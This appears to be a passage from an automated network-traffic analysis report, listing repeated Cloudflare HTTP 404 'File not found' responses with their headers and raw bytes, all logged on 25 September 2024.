                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jVLO9gffFw513TPURJE3Pi%2BZ06oH96G%2BQ6n2jhJkP3B4w%2BaoEcSkz3uA57eQ2CMeaFweVrD%2FDdBOhzZaKyjJpTaNXwZ%2F7zl1HK0PsQxO2rdAFmUL6hNqTGq5sXW2QA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d3999f441ac-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yR1fAnjIXCDwKIhdwof3JKV3wjGOrkPaWjYmwdeku1uPo%2FyaHfcvtwpAQtL5v9P6KSMZzvwlQZf%2FmNcwVFP%2FQ3N4rAmARZoSQp7nnfsU5fU4bzXqzEU2Hswk6EGVYw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d3f9b34185d-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d6BltilIzWT2n5%2Fcczdxexz4WKwAWaj05OMjCAHXqaE4GPGO8mPFd%2F7LAT3UAaF5Iz8S0G5Osqnem9ijYHOVEC7FRK63DxuaYSmlG5ikTZpZ0fbDeE0p1krgj7xx2w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d459e3817e5-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=apMp82T0nO9ffR7XuIugPgbj9Un0RMcWQLvhM0%2BosPxdqiks%2B7kR6iEWlfYP98C8JoeRwdv8YOHZhrPp8%2Fz1mLprledk3zcNvT8ujZdCt0m%2Bm5rTtkSF3Us%2BWnB%2B0w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d4b1882c33f-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5u1pODR0QjiV%2B%2F8LsODk0VD%2Fxz3hDm%2FIEw7G7obB6N4HUCw6T42F94pZz2IiBCwZL%2FYrZp%2BqwovxvPOe2Xb0OAowxBbZABJE9SvQNYhdJiS3v%2B5kb%2FNGGnr21BDeZQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d509b765e67-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zdQbfRDMtURdtBogAg2xNyHD%2FQfsu4V%2BUoct7ZaUFPRmSSfbxbXRQmD%2ByNmlmbfGmNJLhiiuKA8wTbQkF6u7TlA5Y%2BkVgODQmiAI12TLo2D4KfkT3O7%2BoyiVaHzqtA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d55cf8b19ff-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xiRZXFd1kQXkqEB3CsQG%2FgDKP3%2BGAk7ina8dqMfOhgtQul25Tp34GvZN71T0UDIFLmbO8ba6Z7kjnDXV4zojnk5Kbdg03eSmQOxSqmG4QTNE%2BTqqIg3BNzgciCY0pg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d5afc6b0f6b-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OwUihD4zXVViEAIVhfOFNeVCf0rAxkL2UVcFJbs%2F1HmMYIVkR8o0nmHv2z49G5AAHZeCY%2BV5XLIqD7uwNmVKG6l5TGHux%2B1C%2B0xcXCi2yzH4sQT61KXCUGg5Q29Klw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d606d1e15af-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N6w7HtWiY8yjlEhG6rgWDfFtWZmVjqJZGUeKQ08TYNg4Z31nQbkAyoU0JOJG7fboiLhOg5OPkbOvFyQpZLq%2BJLAAKViKyNPushfZc64%2B%2BsTIOVRO2SJrd%2Fidq%2FzEHA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d66294a17c1-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y2uAMHVr29L0GauloR7WxDdg5NlrRYgVqmqwjyzGzzKGSm7cq0KB9lAZKkKhU4OYrg91CUyktvcspHYWV2r17zppt9NDZwx%2FV9AXO3HqDwkPuhPk9UPRJ2v3M96gkQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d6dbeab42cf-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZBpJMgSkEhUlzHQQgQee5auIXr7irW7zTO9tt5sSQjUQ58yg2w0W%2Fjd2LA9u%2FWLgbiHUAZyte3dOdECpNi3aEyVIVt7S3IABN2LBblmfvBn1hKzhkPK0kK1srwCNYg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d735bdc80e2-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PkZtWyEIcvjD%2BY2eIU5JJNe4X7yAvIMhL1nIcYpWRq0LpuNmVC0WkySbZ3eUhvtw0FjfmdWsheAtltlE3%2FJ9%2BlsUWHfQ%2B%2F5zGRI8dJqAZc%2BHsKs5QELro0TQoD4N2g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d7a5b668c8f-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9D%2FZ%2FN%2FxP3SmoC5GxVLIFblR9JlPd0o2szN0te6Qq5kz9nXvvnO9RLxQp5u3FhZ%2B766%2FIGE16WufTl4D1dIrKe%2F4b35EDU8b2T%2F%2FM%2FlePmDEIi8zmhFPJf%2FKcOYwYA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d804d0d8cda-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rMAb5SS%2BjDKXVQRft0%2BLVloeJplOacoHX%2BeqEsAqjcJgs95h%2FC4rewmIdHXXRcRPxJogT0eiBdkraK0HABJJeSIV9YnC0qIlefgocUlm%2F598mHnLg2%2F8JtoFesQlfg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d87f96c42d3-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jeMbbF1sJ%2Bkk94cfnXUI22v9KXJWMYnXuHgfjTzEJr1RksD6SR3CLm3y8GXSqsTwAaPePkm38Zd3KLgWDndgMEfVMDVzvVBTq78%2FCph0kLyER62u79xvUJDuqA%2BT2g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d8d6c79236a-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w65a9baz1SGNB38%2BgIdgTvV7fgR1PzV%2BMjbs9PTsfA3qs0UqKcFFyEKSpnVWRYYQEq18qbxVIatvgLpx3aZElxZ94tpiQpO00vK3SI6qe6ShfDM7hOJdGsPGs2eZAQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d930c9b4269-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0EiiqL1NQ%2BN6k6mMNo9551mkGQokA1OdCvguvpuljgV5W%2BNpdlFM31k6%2Bp2qC%2BkCaCoFNjQPxem5zfZDagXYwziZwiKHueaUG0Xd3%2Ba3IwoOflYD0C3Eoj1aJMIPyw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d99df11236b-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JM0U4PfE0tXGtJN7lBayWhkKXsYVURvvYEVobOSvnpX%2B6k8kj%2BvAMzn2htI5MHqQ5B8iDFPf1VeEIucHiYhq7lkZlfscp4KzqYzVjngOhgAKGL862AwGKBjy0uROcw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d9f4db58c41-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BfAjUqIopytgIuz4TBN8taqHwipOnZBYUiZq1SYTbvdqadgpz4maPQqeOtSmx%2F3XJuZ7GxTM0nup5l0mBMNKDrljZSK%2Fgu%2BsCOXsnhvFzcNpBSajdlCQN7lvC1XGTA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5da4aaf142ee-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3NuHDP%2FSz%2FYtQ6ljfcB%2FI0KNXNJB7VVaA88KYoNdhTLaaeXHEqftF62DTtGg4R2fgq9Q0JSpXmL5cXbjp%2FCqMEKpqfDZ45c%2FsxfO1OKDMBY5i6s%2FCa6dBjI1Z7PviQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5dabdbdb433e-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hE9Wj%2BDYe9ODDjg4DBv7mhNm06WC8r%2FDLTOBZG81JyReIO%2FZeagdtj8bo799760FHrIzyuoLfKkuvsESeXnoL4%2B%2BI8tZvIvDWL%2FZrkUQdW2wWdjVwbJLPs9Au8CDIw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5db0e82f43b2-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=REiRSDWyVSWIPBadI0g69aNy0idqBIRTK00f9sCrffQ8j8n%2Fs9aUyOuJMtGzcyJaqjh6hVUyIUpxa1rbFxvTEFRBm0zZrVmMdPmDXl4M1dLC6hu30yYuZOPYDhd%2Bcw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5db619bb8c96-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OTmzMNkALUXfi3OAlPa0Geya5BIdJEC0YO0cOYAfySs8zbgQ3UEWZVgy4RjuBjpPulyAvEZ98Wjrwl2F5pSZSJSS8Sb%2FW0gyEjfRUo27VxqAmkPxOpi7lXYoa78JRQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5dbcfd198c3b-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5OtQ1e2FVoKBPovdiM%2FBiCE3ZNQKym9kfJv5Jd89DovBhjFmrCL8%2BWSLg2FZsxPHJuQDATP1u9FcvYO6xNMzkIKezqO8h9fHP5c78nObwv1KyHFgxRfrAp6e54YGmA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5dc22aa77274-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8VVF%2FVxdUl%2FJj53OhNXtHf8Nt3cNyxbHEAFTZOF9XlbjCX5ce7%2FX66ES6DFsoi2xqCqllaDroTpEvWIxQdtwD13QcmGkK43Bh3xo9rNzXxRnvqStnxboROkHAw7Sqw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5dc77d3d41b4-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=inOSrd7lx4eBh4mSH7pHRpmG6%2FnA%2B2ib%2F79XDDsArvENTJ0xyhnXTDuesn28GyKqKvbScADSuXudKGUEGc%2BKEf43jDGdnbMDwdFvaiz2xnGx8Rvo8jBYaV0w9iuRkw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5dcd1aea1a03-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wNzKxb2UjThXAihmXlBuPbTBP%2FH3%2FOn%2BXm5M0v%2FVxTIaM%2FR0ZTwf0XVMF8jzqXqeBgk6uVyIZ8A5zvApYZ75Q3gAFbhTdqZ%2BWXyEu9ZyVHL7H93oDY%2FtoQaAtxEhMQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5dd4797a8c81-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4ncYTqk%2FjINLzSoK9LvKxkZGM6Lw5HzdbedsrYuSjQdrORnrNnei6gCMYqx2c8D%2FL9jMFq8Kcr3tDbJ6qd4gounLmBQrnoAVaJuIuApw24PCJt05cxTIf%2FFCL080dQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5dd9dc237295-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=labFOlz3POAGK9xMitwT4rHu6BorhVrCYhSKMa023ZVtDDq18wwmtu50b2azJDP7D4mgtK0y5l1WVUUss7H3VAbLtKrDeCwQdtwAkNSiNAd6k8JSRLpVFrG%2FrmS1Cg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5de0b82642bb-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v6ZfFuuqcbGJIy5myzTdPY3Z36geDybfSk01menpm5YBWWP6dqKHiJ0JhJvUtPoLERWJZLroIDKEKdo2w1ySh8aJhLCzHrFsQAsDgzHsC8q%2BFCOnJoC0RyLJ9nAxpw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5de92ba16a5e-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DU9DYA5QCKYc%2BVWa1Sc4jJXiLEUrjF2utSoe5BEyHg%2FpiYDSpBpp3AgUAQgJscnqhVd2Dp%2FDIhvQzWDm%2FUFNTyI6ZO3%2FJAA33dJmmvvQvnzLTvFu7n5gQLcTpY5n8g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5df0cee81a13-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DU9DYA5QCKYc%2BVWa1Sc4jJXiLEUrjF2utSoe5BEyHg%2FpiYDSpBpp3AgUAQgJscnqhVd2Dp%2FDIhvQzWDm%2FUFNTyI6ZO3%2FJAA33dJmmvvQvnzLTvFu7n5gQLcTpY5n8g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5df0cee81a13-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=57t49o0e5MadRYzEM7F5MPbiCyJcF%2FT6i2hbMxNVauazrjTeMgNsL%2Fa07Z64Aq72LAjvACx61F09oLPOP0wqkmQAIlarUsmSu%2FjzCOhvtFC%2Fc5IfRGVfoEup90AOfg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5df81a928c53-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
